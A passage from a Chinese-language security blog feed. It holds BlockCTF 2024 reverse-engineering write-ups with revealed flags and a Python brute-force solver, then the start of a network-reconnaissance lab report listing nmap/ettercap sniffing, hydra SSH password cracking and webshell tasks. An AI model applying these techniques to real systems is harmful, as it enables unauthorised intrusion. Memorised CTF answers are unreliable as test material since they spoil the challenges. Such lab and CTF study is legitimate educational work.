class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~/Desktop]</span><br><span class="line">└─$ llvm-dis nothin_but_stringz.c.o  -o -</span><br><span class="line">; ModuleID = &#x27;nothin_but_stringz.c.o&#x27;</span><br><span class="line">source_filename = &quot;nothin_but_stringz.c&quot;</span><br><span class="line">target datalayout = &quot;e-m:o-i64:<span class="number">64</span>-i128:<span class="number">128</span>-n32:<span class="number">64</span>-S128&quot;</span><br><span class="line">target triple = &quot;arm64-apple-ios7.<span class="number">0</span>.<span class="number">0</span>&quot;</span><br><span class="line"></span><br><span class="line">@.str = private unnamed_addr constant [<span class="number">40</span> x i8] c&quot;flag&#123;al1_th3_h0miez_l0v3_llvm_643e5f4a&#125;\<span class="number">00</span>&quot;, align <span class="number">1</span></span><br><span class="line">@flag = global ptr @.str, align <span class="number">8</span></span><br><span class="line">@.str.<span class="number">1</span> = private unnamed_addr constant [<span class="number">25</span> x i8] c&quot;The flag begins with %c\<span class="number">0</span>A\<span class="number">00</span>&quot;, </span><br><span class="line"></span><br><span class="line">; Function Attrs: noinline nounwind optnone ssp uwtable(sync)</span><br><span class="line">define i32 @main() #<span class="number">0</span> &#123;</span><br><span class="line">  %<span class="number">1</span> = alloca i32, align <span class="number">4</span></span><br><span class="line">  store i32 <span class="number">0</span>, ptr %<span class="number">1</span>, align <span class="number">4</span></span><br><span class="line">  %<span class="number">2</span> = load ptr, ptr @flag, align <span class="number">8</span></span><br><span class="line">  %<span class="number">3</span> = getelementptr inbounds i8, ptr %<span class="number">2</span>, i64 <span class="number">0</span></span><br><span class="line">  %<span class="number">4</span> = load volatile i8, ptr %<span class="number">3</span>, align <span class="number">1</span></span><br><span class="line">  %<span class="number">5</span> = sext i8 %<span class="number">4</span> to i32</span><br><span class="line">  %<span class="number">6</span> = <span class="keyword">call</span> i32 (ptr, ...) @printf(ptr noundef @.str.<span class="number">1</span>, i32 noundef %<span class="number">5</span>)</span><br><span class="line">  ret i32 <span class="number">0</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">declare i32 @printf(ptr noundef, ...) #<span class="number">1</span></span><br><span class="line"></span><br><span class="line">attributes #<span class="number">0</span> = &#123; noinline nounwind optnone ssp uwtable(sync) &quot;frame-pointer&quot;=&quot;non-lal-vector-width&quot;=&quot;<span class="number">0</span>&quot; &quot;no-trapping-math&quot;=&quot;true&quot; &quot;stack-protector-buffer-size&quot;=&quot;<span class="number">8</span>&quot; &quot;taple-a7&quot; &quot;target-features&quot;=&quot;+aes,+crypto,+fp-armv8,+neon,+sha2,+v8a,+zcm,+zcz&quot; &#125;</span><br><span class="line">attributes #<span class="number">1</span> = &#123; &quot;frame-pointer&quot;=&quot;non-leaf&quot; &quot;no-trapping-math&quot;=&quot;true&quot; &quot;stack-protecze&quot;=&quot;<span class="number">8</span>&quot; &quot;target-cpu&quot;=&quot;apple-a7&quot; &quot;target-features&quot;=&quot;+aes,+crypto,+fp-armv8,+neon,+shazcz&quot; &#125;</span><br><span class="line"></span><br><span class="line">!llvm.module.flags = <span class="variable">!&#123;!</span><span class="number">0</span>, !<span class="number">1</span>, !<span class="number">2</span>, !<span class="number">3</span>, <span class="variable">!4&#125;</span></span><br><span class="line"><span class="variable">!</span>llvm.ident = <span class="variable">!&#123;!</span><span class="number">5</span>&#125;</span><br><span class="line"></span><br><span class="line">!<span class="number">0</span> = !&#123;i32 <span class="number">2</span>, !&quot;SDK Version&quot;, [<span class="number">2</span> x i32] [i32 <span class="number">14</span>, i32 <span class="number">4</span>]&#125;</span><br><span class="line">!<span class="number">1</span> = !&#123;i32 <span class="number">1</span>, !&quot;wchar_size&quot;, i32 <span class="number">4</span>&#125;</span><br><span class="line">!<span class="number">2</span> = !&#123;i32 <span class="number">8</span>, !&quot;PIC Level&quot;, i32 <span class="number">2</span>&#125;</span><br><span class="line">!<span class="number">3</span> = !&#123;i32 <span class="number">7</span>, !&quot;uwtable&quot;, i32 <span class="number">1</span>&#125;</span><br><span class="line">!<span class="number">4</span> = !&#123;i32 <span class="number">7</span>, !&quot;frame-pointer&quot;, i32 <span class="number">1</span>&#125;</span><br><span class="line">!<span class="number">5</span> = <span class="variable">!&#123;!</span>&quot;Apple clang version <span class="number">15</span>.<span class="number">0</span>.<span class="number">0</span> (clang-<span class="number">1500</span>.<span class="number">3</span>.<span class="number">9</span>.<span class="number">4</span>)&quot;&#125;</span><br></pre></td></tr></table></figure><p> flag: <code>flag&#123;al1_th3_h0miez_l0v3_llvm_643e5f4a&#125;</code></p><h2 id="Red-Flags"><a href="#Red-Flags" class="headerlink" title="Red Flags"></a>Red Flags</h2><blockquote><p>I made a video game, its really hard!</p><p><a href="https://2024.blockctf.com/files/6559c2a3811959ed006fd7bddc90b09a/linux.zip?token=eyJ1c2VyX2lkIjoxNzMsInRlYW1faWQiOjEwMCwiZmlsZV9pZCI6Mjd9.ZzVPWg.vY3x7Y0pOswsvSLX6-VlXWgKVf8">linux.zip</a> <a href="https://2024.blockctf.com/files/a32d6ee2150eb16a3952a62202393a27/win.zip?token=eyJ1c2VyX2lkIjoxNzMsInRlYW1faWQiOjEwMCwiZmlsZV9pZCI6Mjl9.ZzVPWg.y5oGk0zPMvqKYVA2zLzDH1XEwL8">win.zip</a> <a href="https://2024.blockctf.com/files/7a457d658f9aaef0b50518cf6ac8caed/osx.zip?token=eyJ1c2VyX2lkIjoxNzMsInRlYW1faWQiOjEwMCwiZmlsZV9pZCI6Mjh9.ZzVPWg.oUTquu0H8-6YKdTDrk0cAO3L2zY">osx.zip</a></p></blockquote><p>又是新东西：godot游戏，</p><blockquote><p>Godot 的主要编程语言是 <strong>GDScript</strong>，同时也支持 <strong>C#<strong>、</strong>C++</strong> 和其他语言。对于初学者，推荐从 GDScript 开始；对于需要复杂功能或生态支持的项目，可以选择 C# 或其他绑定语言。</p></blockquote><p>工具：recover project</p><p><a href="https://github.com/bruvzg/gdsdecomp">https://github.com/bruvzg/gdsdecomp</a></p><p>保存到本地，发现flag.tscn:</p><figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">func _process(delta):</span><br><span class="line"><span class="keyword">if</span> is_transitioning:</span><br><span class="line">%FlagSprite.material.set_shader_parameter(\<span class="string">&quot;state\&quot;, current_state)</span></span><br><span class="line"><span class="string">if target_state:</span></span><br><span class="line"><span class="string">current_state += 1.0/TRANSITION_TICKS</span></span><br><span class="line"><span class="string">if current_state &gt;= 1:</span></span><br><span class="line"><span class="string">current_state = 1</span></span><br><span class="line"><span class="string">is_transitioning = false</span></span><br><span class="line"><span class="string">else:</span></span><br><span class="line"><span class="string">current_state -= 1.0/TRANSITION_TICKS</span></span><br><span class="line"><span class="string">if current_state &lt;= 0:</span></span><br><span class="line"><span class="string">current_state = 0</span></span><br><span class="line"><span class="string">is_transitioning = false</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure><p>flag.tscn全文：</p><figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line">[<span class="meta">gd_scene load_steps=7 format=3</span>]  <span class="meta"># 声明场景的格式和加载步骤。</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 资源声明，加载一个着色器和一个纹理</span></span><br><span class="line">[<span class="meta">ext_resource type=<span class="string">&quot;Shader&quot;</span> path=<span class="string">&quot;res://flag.gdshader&quot;</span> id=<span class="string">&quot;1&quot;</span></span>]  <span class="meta"># 加载一个自定义着色器文件</span></span><br><span class="line">[<span class="meta">ext_resource type=<span class="string">&quot;Texture2D&quot;</span> uid=<span class="string">&quot;uid://c2m78fell0vq7&quot;</span> path=<span class="string">&quot;res://flag_enabled.png&quot;</span> id=<span class="string">&quot;2&quot;</span></span>]  <span class="meta"># 加载一个纹理文件</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 声明一个脚本，控制标志的行为</span></span><br><span class="line">[<span class="meta">sub_resource type=<span class="string">&quot;GDScript&quot;</span> id=<span class="string">&quot;GDScript_0la3o&quot;</span></span>]</span><br><span class="line">script/source = <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">extends StaticBody2D</span></span><br><span class="line"><span class="string">class_name Flag</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">const TRANSITION_TICKS = 100  # 每次状态变更的过渡帧数</span></span><br><span class="line"><span class="string">var target_state = true  # 目标状态，初始为 true（标志的开启状态）</span></span><br><span class="line"><span class="string">var is_transitioning = false  # 是否正在进行过渡</span></span><br><span class="line"><span class="string">@export var current_state = 1.0  # 当前状态，默认值为 1.0 (标志为开启)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># Called when the node enters the scene tree for the first time.</span></span><br><span class="line"><span class="string">func _ready():</span></span><br><span class="line"><span class="string">    # 复制并设置材质的着色器参数，以便在运行时修改</span></span><br><span class="line"><span class="string">    %FlagSprite.material = %FlagSprite.material.duplicate()</span></span><br><span class="line"><span class="string">    %FlagSprite.material.set_shader_parameter(&quot;state&quot;, current_state)</span></span><br><span class="line"><span class="string">    pass  # 替换为实际的函数体</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># Called every frame. &#x27;delta&#x27; is the elapsed time since the previous frame.</span></span><br><span class="line"><span class="string">func _process(delta):</span></span><br><span class="line"><span class="string">    # 如果标志正在过渡状态</span></span><br><span class="line"><span class="string">    if is_transitioning:</span></span><br><span class="line"><span class="string">        %FlagSprite.material.set_shader_parameter(&quot;state&quot;, current_state)  # 更新着色器的状态参数</span></span><br><span class="line"><span class="string">        if target_state:</span></span><br><span class="line"><span class="string">            # 如果目标状态是开启，则逐渐增加 current_state</span></span><br><span class="line"><span class="string">            current_state += 1.0 / TRANSITION_TICKS</span></span><br><span class="line"><span class="string">            if current_state &gt;= 1:</span></span><br><span class="line"><span class="string">                current_state = 1  # 最大为 1</span></span><br><span class="line"><span class="string">                is_transitioning = false  # 过渡完成</span></span><br><span class="line"><span class="string">        else:</span></span><br><span class="line"><span class="string">            # 如果目标状态是关闭，则逐渐减小 current_state</span></span><br><span class="line"><span class="string">            current_state -= 1.0 / TRANSITION_TICKS</span></span><br><span class="line"><span class="string">            if current_state &lt;= 0:</span></span><br><span class="line"><span class="string">                current_state = 0  # 最小为 0</span></span><br><span class="line"><span class="string">                is_transitioning = false  # 过渡完成</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># 当其他物体进入 Area2D 时切换标志的状态</span></span><br><span class="line"><span class="string">func _on_area_2d_body_entered(body):</span></span><br><span class="line"><span class="string">    is_transitioning = true  # 开始过渡</span></span><br><span class="line"><span class="string">    target_state = not target_state  # 切换目标状态</span></span><br><span class="line"><span class="string">    pass</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 定义一个着色器材质，并将其绑定到 FlagSprite</span></span><br><span class="line">[<span class="meta">sub_resource type=<span class="string">&quot;ShaderMaterial&quot;</span> id=<span class="string">&quot;ShaderMaterial_fvcap&quot;</span></span>]</span><br><span class="line">shader = ExtResource(<span class="string">&quot;1&quot;</span>)  <span class="meta"># 使用之前加载的着色器</span></span><br><span class="line">shader_parameter/state = <span class="number">0.0</span>  <span class="meta"># 初始状态为关闭（0.0）</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 另一个脚本，控制 Area2D 的行为</span></span><br><span class="line">[<span class="meta">sub_resource type=<span class="string">&quot;GDScript&quot;</span> id=<span class="string">&quot;GDScript_f80tv&quot;</span></span>]</span><br><span class="line">script/source = <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">extends Area2D</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># Called when the node enters the scene tree for the first time.</span></span><br><span class="line"><span class="string">func _ready():</span></span><br><span class="line"><span class="string">    pass  # 替换为实际的函数体</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># Called every frame. &#x27;delta&#x27; is the elapsed time since the previous frame.</span></span><br><span class="line"><span class="string">func _process(delta):</span></span><br><span class="line"><span class="string">    pass  # 替换为实际的函数体</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 定义一个矩形形状作为碰撞体</span></span><br><span class="line">[<span class="meta">sub_resource type=<span class="string">&quot;RectangleShape2D&quot;</span> id=<span class="string">&quot;RectangleShape2D_l6lhs&quot;</span></span>]</span><br><span class="line">size = Vector2(<span class="number">3933</span>, <span class="number">4005</span>)  <span class="meta"># 设置矩形的大小</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 定义一个 StaticBody2D 节点，代表标志对象</span></span><br><span class="line">[<span class="meta">node name=<span class="string">&quot;Flag&quot;</span> type=<span class="string">&quot;StaticBody2D&quot;</span></span>]</span><br><span class="line">script = SubResource(<span class="string">&quot;GDScript_0la3o&quot;</span>)  <span class="meta"># 绑定之前定义的脚本</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 定义一个 Sprite2D 节点，作为标志的显示图像</span></span><br><span class="line">[<span class="meta">node name=<span class="string">&quot;FlagSprite&quot;</span> type=<span class="string">&quot;Sprite2D&quot;</span> parent=<span class="string">&quot;.&quot;</span></span>]</span><br><span class="line">unique_name_in_owner = <span class="literal">true</span>  <span class="meta"># 确保该 Sprite 在其父节点中唯一</span></span><br><span class="line">material = SubResource(<span class="string">&quot;ShaderMaterial_fvcap&quot;</span>)  <span class="meta"># 使用自定义材质</span></span><br><span class="line">texture = ExtResource(<span class="string">&quot;2&quot;</span>)  <span class="meta"># 使用之前加载的纹理</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 定义一个 Area2D 节点，用于检测进入该区域的物体</span></span><br><span class="line">[<span class="meta">node name=<span class="string">&quot;Area2D&quot;</span> type=<span class="string">&quot;Area2D&quot;</span> parent=<span class="string">&quot;.&quot;</span></span>]</span><br><span class="line">script = SubResource(<span class="string">&quot;GDScript_f80tv&quot;</span>)  <span class="meta"># 绑定之前定义的脚本</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 定义一个 CollisionShape2D，绑定矩形碰撞形状到 Area2D</span></span><br><span class="line">[<span class="meta">node name=<span class="string">&quot;CollisionShape2D&quot;</span> type=<span class="string">&quot;CollisionShape2D&quot;</span> parent=<span class="string">&quot;Area2D&quot;</span></span>]</span><br><span class="line">position = Vector2(<span class="number">22.5</span>, <span class="number">-65.5</span>)  <span class="meta"># 设置碰撞体的位置</span></span><br><span class="line">shape = SubResource(<span class="string">&quot;RectangleShape2D_l6lhs&quot;</span>)  <span class="meta"># 绑定矩形碰撞形状</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># 连接 Area2D 的信号，当有物体进入时调用 Flag 的方法</span></span><br><span class="line">[<span class="meta">connection signal=<span class="string">&quot;body_entered&quot;</span> from=<span class="string">&quot;Area2D&quot;</span> to=<span class="string">&quot;.&quot;</span> method=<span class="string">&quot;_on_area_2d_body_entered&quot;</span></span>]</span><br></pre></td></tr></table></figure><p>和arena.tscn:</p><figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> flags</span><br><span class="line"><span class="meta"># Called when the node enters the scene tree for the first time.</span></span><br><span class="line">func _ready():</span><br><span class="line">flags = get_children().filter(func(child): <span class="keyword">return</span> child.name.match(\<span class="string">&quot;Flag_*\&quot;))</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">func hex_byte_to_int(c):</span></span><br><span class="line"><span class="string">if c &gt;= 0x30 &amp;&amp; c &lt;= 0x39:</span></span><br><span class="line"><span class="string">return c - 0x30</span></span><br><span class="line"><span class="string">else:</span></span><br><span class="line"><span class="string">return c - 0x37</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># Called every frame. &#x27;delta&#x27; is the elapsed time since the previous frame.</span></span><br><span class="line"><span class="string">func _process(delta):</span></span><br><span class="line"><span class="string">var states = []</span></span><br><span class="line"><span class="string">for flag in flags:</span></span><br><span class="line"><span class="string">states.append(int(flag.target_state))</span></span><br><span class="line"><span class="string">var flaggregate = \&quot;\&quot;.join(states)</span></span><br><span class="line"><span class="string">var sha = flaggregate.sha1_text().to_upper()</span></span><br><span class="line"><span class="string">sha += flaggregate.md5_text().to_upper()</span></span><br><span class="line"><span class="string">var chars = %FlagText.get_children()</span></span><br><span class="line"><span class="string">for i in chars.size():</span></span><br><span class="line"><span class="string">chars[i].target_x = hex_byte_to_int(sha.unicode_at(i * 2)) - 8</span></span><br><span class="line"><span class="string">chars[i].target_y = hex_byte_to_int(sha.unicode_at((i * 2) + 1)) - 8</span></span><br></pre></td></tr></table></figure><p>看**.;,;.** 团队关于这个题目的解法：</p><blockquote><p>There are 1024 unique possible states since there are 10 “Flag_*” objects, so we can brute force all possible states and pick the one where the characters lie close together on the Y axis.</p><p>由于有 10 个 “Flag_*”对象，因此有 1024 种可能的状态，我们可以对所有可能的状态进行暴力破解，选出字符在 Y 轴上靠拢的状态。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> sha1, md5</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hex_byte_to_int</span>(<span class="params">c</span>):</span><br><span class="line">    <span class="keyword">if</span> c &gt;= <span class="number">0x30</span> <span class="keyword">and</span> c &lt;= <span class="number">0x39</span>:</span><br><span class="line">        <span class="keyword">return</span> c - <span class="number">0x30</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> c - <span class="number">0x37</span></span><br><span class="line"></span><br><span class="line">chars = []</span><br><span class="line">arena = <span class="built_in">open</span>(<span class="string">&#x27;arena.tscn&#x27;</span>, <span class="string">&#x27;r&#x27;</span>).read().split(<span class="string">&#x27;\n&#x27;</span>)[<span class="number">151</span>:]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>):</span><br><span class="line">    chunk = arena[i*<span class="number">9</span>:i*<span class="number">9</span>+<span class="number">9</span>]</span><br><span class="line">    x = <span class="built_in">float</span>(chunk[<span class="number">1</span>].split()[-<span class="number">1</span>])</span><br><span class="line">    y = <span class="built_in">float</span>(chunk[<span class="number">2</span>].split()[-<span class="number">1</span>])</span><br><span class="line">    text = <span class="built_in">eval</span>(chunk[<span class="number">5</span>].split()[-<span class="number">1</span>])</span><br><span class="line">    <span class="comment"># print(x, y, text)</span></span><br><span class="line">    chars.append((x, y, text))</span><br><span class="line"></span><br><span class="line">S = <span class="number">50</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span>**<span class="number">10</span>):</span><br><span class="line">    b = <span class="built_in">bin</span>(i)[<span class="number">2</span>:].zfill(<span class="number">10</span>)</span><br><span class="line">    sha = sha1(b.encode()).hexdigest().upper().encode()</span><br><span class="line">    sha += md5(b.encode()).hexdigest().upper().encode()</span><br><span class="line"></span><br><span class="line">    X, Y = [], []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>):</span><br><span class="line">        X.append(hex_byte_to_int(sha[i * <span class="number">2</span>]) - <span class="number">8</span>)</span><br><span class="line">        Y.append(hex_byte_to_int(sha[i * <span class="number">2</span> + <span class="number">1</span>]) - <span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">    chars_moved = []</span><br><span class="line">    <span class="keyword">for</span> i, (x, y, text) <span class="keyword">in</span> <span class="built_in">enumerate</span>(chars):</span><br><span class="line">        chars_moved.append((x + X[i] * S, y + Y[i] * S, text))</span><br><span class="line">    </span><br><span class="line">    chars_moved_y = [y <span class="keyword">for</span> x, y, text <span class="keyword">in</span> chars_moved]</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">max</span>(chars_moved_y) - <span class="built_in">min</span>(chars_moved_y) &lt; <span class="number">100</span>:</span><br><span class="line">        <span class="comment"># print(b)</span></span><br><span class="line">        chars_moved.sort(key=<span class="keyword">lambda</span> x: x[<span class="number">0</span>]) <span class="comment"># left to right</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;&#x27;</span>.join([text <span class="keyword">for</span> x, y, text <span class="keyword">in</span> chars_moved]))</span><br></pre></td></tr></table></figure></blockquote><p>还有yuro和BMK的思路：</p><p>没太懂。。问问</p><h2 id="An-Elf-on-a-Shelf"><a href="#An-Elf-on-a-Shelf" class="headerlink" title="An Elf on a Shelf"></a>An Elf on a Shelf</h2><p>What’s going on here?</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/elf.png" alt="elf"></p><p><strong>“这是什么misc题放到rev中了吗”</strong></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;BlockCTF-2024-Reverse&quot;&gt;&lt;a href=&quot;#BlockCTF-2024-Reverse&quot; class=&quot;headerlink&quot; title=&quot;BlockCTF 2024 Reverse&quot;&gt;&lt;/a&gt;BlockCTF 2024 Reverse&lt;/</summary>
      
    
    
    
    
    <category term="Re" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/Re/"/>
    
  </entry>
  
  <entry>
    <title>网络侦察实验</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/21/wang-luo-zhen-cha-shi-yan/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/21/wang-luo-zhen-cha-shi-yan/</id>
    <published>2024-11-21T03:33:10.859Z</published>
    <updated>2024-12-16T03:44:47.498Z</updated>
    
    <content type="html"><![CDATA[<h1 id="一．实验名称：网络侦察实验"><a href="#一．实验名称：网络侦察实验" class="headerlink" title="一．实验名称：网络侦察实验"></a>一．实验名称：网络侦察实验</h1><h3 id="【实验描述】"><a href="#【实验描述】" class="headerlink" title="【实验描述】"></a>【实验描述】</h3><p>随着时代的发展和网络的普及，在世界各国、各层次的计算机网络中，储存着大量公开资料和机密资料，由于网络漏洞的存在，为“黑客”入侵计算机网络系统获取机密资料提供了很多便利，这些资料引起了各国军事情报部门的重视，都大力开展利用计算机网络系统来获取情报资料的研究和尝试，这便是网络侦察。</p><p>网络侦查是指黑客为了更加有效地实施攻击而在攻击前或攻击过程中对目标主机的所有探测活动。网络侦查有时也被称为“踩点”。通常“踩点”包括以下内容：目标主机的域名、IP地址、操作系统类型、开放了哪些端口，以及这些端口后面运行着什么样的应用程序，这些应用程序有没有漏洞等。那么如何收集信息呢？可以利用与技术无关的“社会工程学”、搜索引擎以及扫描工具。</p><p>本实验旨在通过在企业复杂网络场景下的网络侦查应用实战，让学生深刻理解网络侦查的概念、特性和原理，掌握网络侦查相关技术，具备对网络进行侦查、渗透、敏感信息获取以及防网络侦查的技术能力，这对于学生的信息安全技术能力提升、国家网络空间安全战略实施，都有非常重要的意义。</p><p>本实验内容共包含4个子任务，分别是：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">任务一 使用nmap、ettercap进行网络侦查和密码嗅探；</span><br><span class="line">任务二 使用crunch、hydra暴力破解ssh服务登陆密码；</span><br><span class="line">任务三 使用ssh登录目标机，获得敏感信息；</span><br><span class="line">任务四 获取目标网站的webshell权限，控制目标机，获得敏感信息。</span><br></pre></td></tr></table></figure><h1 id="二．实验目的："><a href="#二．实验目的：" class="headerlink" title="二．实验目的："></a>二．实验目的：</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">了解网络侦查、信息收集、漏洞挖掘和利用的基本概念以及常用的信息收集和安全漏洞扫描工具，认知常见的网络侦查手段和企业网络安全漏洞。</span><br><span class="line">掌握nmap工具的功能和操作方法，并能够分析检侧结果，能够运用这些工具解决目标网络信息探测、漏洞挖掘等常见的安全问题。</span><br><span class="line">了解ettercap嗅探工具的基本功能，掌握常见的嗅探相关服务和应用的用户名和密码的方法。</span><br><span class="line">了解crunch的基本功能，掌握利用crunch生成密码字典文件的方法。</span><br><span class="line">了解hydra密码爆破工具的基本功能和使用方法，掌握常见的爆破服务和应用的用户名和密码的方法。</span><br><span class="line"> 熟悉网站wenshell的概念，理解上传webshell、获取webshell权限的意义和方法，掌握获取webshell权限基础上控制目标机的方法。</span><br></pre></td></tr></table></figure><p>通过nmap、ettercap、crunch和hydra等工具的学习和使用，能够融会贯通，掌握相关服务如ftp、web等漏洞挖掘、渗透、攻击和利用的原理和方法，掌握自主学习和实践主流企业网络扫描工具的功能、操作技巧、检测结果分析、网络侦查、漏洞挖掘的常用方法，具备企业复杂网络信息安全管理的职业能力和终身学习能力。</p><h3 id="【实验工具】"><a href="#【实验工具】" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>Nmap（集成于kali linux）</li><li>ettercap（集成于kali linux）</li><li>crunch（集成于kali linux）</li><li>hydra（集成于kali linux）</li><li>Firefox（54.2.0）</li><li>Rdesktop</li></ul><h1 id="三．实验环境："><a href="#三．实验环境：" class="headerlink" title="三．实验环境："></a>三．实验环境：</h1><table><thead><tr><th>操作系统</th><th>IP地址</th><th>服务器角色</th><th>登录账户密码</th></tr></thead><tbody><tr><td>kali 